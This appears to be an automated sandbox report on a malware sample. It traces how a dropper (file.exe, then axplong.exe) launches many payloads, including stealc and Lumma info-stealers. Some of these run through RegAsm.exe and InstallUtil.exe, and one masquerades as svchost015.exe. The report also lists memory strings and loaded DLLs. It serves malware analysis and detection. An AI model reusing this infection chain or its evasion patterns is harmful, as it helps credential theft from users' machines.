Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000374B000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003735000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000003.2925273256.0000000021419000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000003.2938660339.0000000021435000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000003.3166207992.0000000020F9B000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000003.3138284444.0000000020FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe "C:\Users\user\AppData\Roaming\esFzLrEqPw.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe "C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe "C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 908
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe "C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe "C:\Users\user\AppData\Roaming\esFzLrEqPw.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe "C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
